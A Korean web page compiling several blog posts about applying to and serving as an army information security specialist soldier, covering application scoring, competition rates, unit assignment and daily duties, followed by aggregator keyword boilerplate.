경력에서는 아직 대학생이고 BOB를 수료하지 않아서 얻을 수 있는 점수는 없다. 작년에는 KUSIS에 등록된 동아리에 가입되어 있으면 4점을 주고 기타 동아리에만 들어가도 1점을 주었는데 올해는 BOB 수료자만 6점을 주고 있어서 평균 점수가 내려가지 않을까 싶다.

자격증에서는 아무 자격증이 없으면 기본 10점을 주고 가장 자격등급이 높은 자격증 하나만 인정하여 점수를 준다. 리눅스 마스터 2급이 있지만 여기에는 해당되지 않는 것 같아 사본 조차 내지 않았고 그래서 10점을 받았다.

면접은 1차 서류 전형이 붙어야 면접을 볼 수 있고 20점은 구술 면접 20점은 필기시험으로 구성되어 있다. 작년에 비해 필기시험이 10점 더 높아져 비중이 매우 커졌으니 공부를 열심히 해야 될 것 같다.

총점수 및 경쟁률

내 졈수는 2년 재학 14점 + 고교 출석 10점 + 자격증 기본 10 점하여 총 34점이다.

올해 기준이 아닌 작년이나 다른 모집 때와 비교하면 평균 1차 서류 전형은 38 이상은 되어야 안전하게 합격이라고 하는데, 올해는 면접 점수의 비중이 커지고 대학교 재학 상황과 경력의 점수 분배가 달라져서 커트라인이 내려갈 것으로 예상된다. 작년 기준으로 내 점수를 매기면 40점으로 간당간당하게 합격할 수 있는 커트라인이다. 그래서 이제는 한 30~32점 이상은 되어야 합격 커트라고 볼 수 있겠다.

올해 경쟁률은 2.5:1로 내가 조사한 어느 경쟁률 보다도 가장 낮은 경쟁률인 것 같다. 보통 5:1에서 6:1 혹은 그 이상 정도가 되는데 2.5:1이면 절반 이하로 떨어졌으니 더 쉬울 수도(?) 있을 것 같다는 생각이 든다.

제발 한 번에 합격해서 이 영원한 숙제를 끝내버리고 싶다.

=======================================================

4.20 1차 결과가 나왔다.

배점은 내가 예상한 대로였고 놀랍게도 내 선발 순위가 매우 높았다는 것이다. 4점 차이로 약 29위가 차이나고 40명을 뽑는데 아무 스펙 없고 제1 지망 대학이었던 내가 51위나 하였으니 이제 문제풀이와 면접에 모든 게 달렸다는 것이다….. 정보보호 기사를 공부하고 가라는데, 참고해서 약 2주의 기간 동안 열심히 공부하고 준비해서 한 번에 붙어야겠다.

[INFORMATION GUARD] 정보보호병 합격 후기 01

정보보호병 1차 합격하기까지 필자가 계획하던 군입대는 1학년 마치고 바로이다. 필자의 첫 목표는 해병대였지만, 불합격,, 이후로 코로나라 군대 가기 힘든 것은 파악하고 해병대를 쳐다보지도

오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다.

코로나 시대… 정말 군대 가기 힘들다..

한 달의 한번 떨리는 마음으로 있어야 했고,

늘 선착순 지원으로 필자를 미치게 했던 그 시기…. 이제는 안녕!!

정보보호병으로 당당히 입대한다!

IT특기병으로 취업까지 두마리 토끼잡기

IT특기병의 최대 장점은 실무를 경험하여 취업 시 실무능력을 확인할 수 있으며 경력이 단절되지 않고 이로 인해 경력으로 일부 인정된다는 장점이 있습니다.

하지만 육군의 경우 해군이나 공군과 달리 같은 정보보호 인원이라고 하더라도 권한이 거의 없기 때문에 현실적인 업무는 전화업무와 관제가 대부분입니다. 관제 근무의 특성상 24시간 근무인력이 있어야하기 때문에 야간 당직근무가 잦으며 이로 인한 피로도가 심합니다.

실질적인 실무를 경험하고 싶다면 공군을, 편하게 군생활 하고 싶다면 해군 CERT를 지원하는 것이 좋습니다.

※ 군 복무기간은 육군(약 18개월), 해군(약 20개월), 공군(약 23개월)입니다.

IT특기병의 단점이라고 한다면 타 부서와의 마찰이 잦다는 것입니다. 개발 관련 부대와 서버 운영 관련 부대에서 일하게 되어도 마찬가지이죠. 어디를 간다고 해도 공통적인 부분은 문의 처리를 많이 하게된다는 것입니다.

정보보호체계는 여차하면 PC 등 사용자 단말(혹은 서버)을 차단해 버리고, 수동으로 정책을 재설정해주어야 합니다. 방화벽 등 정책 유지 보수가 필수적인 부분은 간부가 하겠지만 네트워크 접근제어 체계같이 손이 많이 가는 단순 작업은 거의 병사가 한다고봐도 됩니다.

인포콘 지원 때문인지 CERT를 컴퓨터 관련 문의 안내 센터 정도로 생각하는 분들이 대부분이며 어떤 일을 하는 곳인지 잘 모른다는 것입니다.

하지만, 앞서 설명드린 실무를 경험하고, 그로 인한 취업 시 경력을 인정받을 수 있다는 점이 가장 큰 장점이기에 많이 지원합니다. 즉, 육해공 통틀어 힘들던 편하던 경력이 인정된다는 것이죠.

2021년 기준 육군 정보보호병에 대해

반응형

필자는 1월 11일에 정보보호병에 입대했다.

정보보호분야 전공자에게 필수인가?

필자는 고등학교 때 부터 정보보호 분야로 진출하고자 마음을 먹었다. 그 때부터 관련된 정보들을 찾아보다가 남자라면 필수로 거쳐야 할 군대에서 정보보호 관련 특기를 살릴 수 있는 정보보호병 에 대해서 알게 되었다.

병무청 홈페이지에서 정보보호병이 속해 있는 병과

우선 정보보호병은 육군 기준으로 전문특기병으로 분류되어 만기 전역 시, 전역증과 함께 군 경력 증명서를 발급할 수 있다. 복무기간 1년 6개월 중, 기초 군사훈련 기간(훈련소)을 제외한 기간은 모두 경력으로 인정해주니 약 1년 5개월의 정보보호 업무 경력을 공식적으로 인정받을 수 있다. 자대를 배치받고 현재까지 약 한 달간 실제 정보보호병의 업무를 맡아본 결과 경력이 될 만한 것들을 시키고 관련 역량들을 요구한다고 느끼기도 하였다.

※ 물론 실제 맡게 될 업무는 부대 by 부대, 간부 by 간부가 심해서 정보보호병이 갈 수 있는 최소 규모의 부대인 사단으로 자대배치 받은 경우는 다를 수도 있다.

또한 컴퓨터를 이용해 임무를 수행하기 때문에 일하다가 궁금한 점이 생기면 바로바로 검색이 가능하고, 실내 근무가 보장되기 때문에 무더운 여름날 땡볕에서 잡초를 뽑거나 페인트질을 할 일은 다른 병과에 비해 현저히 적다(아예 없진 않다ㅋ). 그리고 정보보호장비들(NAC, UTM 등)을 다뤄 보며 정책을 적용하거나 어떠한 경우에 방화벽 차단이 이뤄지는지를 직접 볼 수 있다. 관제 업무도 동반하기 때문에 관제에 필요한 능력을 길러나갈 수도 있다.

어떤가? 꼭 정보보호관련 전공자가 아니더라도 끌리지 않겠는가?

정보보호병은 자대를 어디로 배치 받는가?

병무청 홈페이지에서 설명하고 있는 정보보호병에 대한 정보이다. 최근에 업데이트 된 내용인데, 정보보호병이 자대 배치를 받게 될 때 해당 부대의 규모를 알려주려는 것 같다. 내용을 보충하면 전방의 일부사단이라고 적혀 있는데 후방의 사단으로도 충분히 배치 받을 수 있다. 사령부급의 직할대(정보통신)로 배치받을 수도 있다. 정보보호병들의 자대를 배치할 때 기준은 없다. 무조건 랜덤으로 난수를 돌리기 때문에 입대 시기에 T.O가 난 부대들 중에서 뺑뺑이를 돌린다. 극히 드문 경우로 큰 규모 대회의 수상경력이나 오랜 회사 근무 경력이 있으면 국직 부대나 육본 등에서 미리 차출할 가능성도 있다. 이전에 부바부가 심하다고 했는데, 배치 받는 부대의 규모가 사령부~ 사단까지이므로 차이가 극명하기 때문에 맡게 될 업무가 달라질 수 밖에 없다. 예를 들어, 사령부 급 부대에서는 밑의 수 개의 모든 예하부대들을 관리 해야하기 때문에 사단에 비해 업무량이 많고, 정보보호 업무에 대한 체계가 잘 잡혀 있는 경우가 많다. 반면 사단급 부대는 사단 밑의 대대나 연대만 관리하면 되므로 업무량이 적은 대신, 정보보호 관련 업무 외의 업무(포맷이나 PC세팅이나 기타 행정업무 같은 것들)를 맡게 될 수도 있다.

필자 개인적으로 정보보호병에겐 전방의 사단이 여러모로 힘든 곳이라고 생각한다.

정보보호병의 경쟁률은 얼마인가?

어쨌든 앞서 소개했던 이점들 때문에 지원하려는 인원이 몰려 경쟁 역시 치열하다.

필자가 지원했던 시기의 경쟁률

20년도 최고 경쟁률 [5.2:1]

필자가 지원할 때의 경쟁률은 3.2 였고, 복학시기를 맞추기 편한 골든타임일 때는 최대 5.2까지 치솟기도 한다. 평균적으로는 2~3 정도인 듯 하다. 따라서 지원할 때 전략 아닌 전략은, 자신이 정보보호병을 꼭 하고 싶다면 복학시기가 애매한 시기(3, 4, 9, 10월 등)에 지원해서 경쟁률이 낮은 때를 노리는 것 방법이 있다.

정보보호병을 하기 위해 얼마나 준비해야하나?

자신이 안정적인 합격을 원하면 입대 일을 기준으로 적어도 4달 전 부터는 준비해야 한다고 생각한다. 다음 게시물엔 필자의 준비과정과 서류, 면접 과정에 대해 소개하도록 한다.

반응형

키워드에 대한 정보 정보 보호 병

다음은 Bing에서 정보 보호 병 주제에 대한 검색 결과입니다. 필요한 경우 더 읽을 수 있습니다.

이 기사는 인터넷의 다양한 출처에서 편집되었습니다. 이 기사가 유용했기를 바랍니다. 이 기사가 유용하다고 생각되면 공유하십시오. 매우 감사합니다!

사람들이 주제에 대해 자주 검색하는 키워드 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)

  • 정보보호병
  • 정보보호기술병
  • 군대
  • 소프트웨어병
  • 소프트웨어개발병
  • 컴퓨터공학
  • 컴공
  • 지원
  • 방법
  • 병무청
  • 국방부
  • 사이버전사
  • 정보보호

컴공은 #꼭 #군대를 #여기로 #가세요… #(Feat. #정보보호병 #/ #소프트웨어개발병)


YouTube에서 정보 보호 병 주제의 다른 동영상 보기

주제에 대한 기사를 시청해 주셔서 감사합니다 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) | 정보 보호 병, 이 기사가 유용하다고 생각되면 공유하십시오, 매우 감사합니다.

Leave a Comment